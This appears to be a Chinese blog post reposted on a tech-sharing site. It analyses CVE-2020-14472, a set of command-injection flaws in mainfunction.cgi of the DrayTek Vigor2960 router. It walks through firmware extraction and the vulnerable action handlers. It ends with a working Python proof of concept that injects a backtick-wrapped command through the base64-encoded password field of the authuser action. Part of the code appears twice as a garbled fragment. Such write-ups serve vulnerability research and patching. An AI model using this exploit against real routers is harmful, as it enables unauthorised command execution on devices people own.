标签:cgi p1 url data 14472 session 2020 CVE root
CVE-2020-14472
https://github.com/Cossack9989/Vulns/blob/master/IoT/CVE-2020-14472.md
下载解压固件
https://www.draytek.com.tw/ftp/Vigor2960/Firmware
使用ubi
ubireader_extract_images Vigor2960_v1.5.0.all #得到ubi文件
ubireader_extract_files file.ubi
漏洞点在/www/cgi-bin/mainfunction.cgi
流程分析
进入main函数
如果v4不符合条件
在action对应的字符串旁边找到对应的函数
漏洞点
1
命令执行漏洞
对应action为get_subconfig
sub_EA24两个参数可控
进去看
参数2最终被赋值到v16并被执行
2
doOpenVPN
可以看到控制option的值可以走到下面的分支,代码执行
3.
dogetunnel
4.
download_ovpn
5
dumpSyslog
6
set_ap_map_config
7
8
POC
未经授权的命令注入
我们发现未经授权的 mainfunction.cgi,前提是路由器可以通过SMS进行授权。该漏洞将由frompassword包含值的命令(例如“ 123456reboot”)触发。
如果路由器支持通过SMS登录并且/var/sms_phone_auth攻击者知道用户的电话号码或其中的内容,则攻击者将能够通过恶意有效负载(例如作为reboot下面的有效负载的注入)注入任意命令。
from sys import argv
from base64 import b64encode
import requests
data = {
"URL": "192.168.1.1",
"HOST": "http://192.168.1.1",
"action": "authuser",
"formusername": b64encode(b"test").decode(),
"formpassword": b64encode(b"12345678`reboot`").decode(),
"PHONENUMBER": argv[1] # the known phone number
}
header = {
"Content-Type": "application/raw"
}
url = {
"root": "http://192.168.1.1",
"cgi": {
"root": "/cgi-bin",
"uri": {
"mf": "/mainfunction.cgi",
}
}
}
def build_url(p1, p2=None):
if p2:
return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
else:
return url["root"] + url[p1]
session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)
["uri"][p2]
else:
return url["root"] + url[p1]
session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)
标签:cgi,p1,url,data,14472,session,2020,CVE,root 来源: https://blog.csdn.net/weixin_44932880/article/details/112715297
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。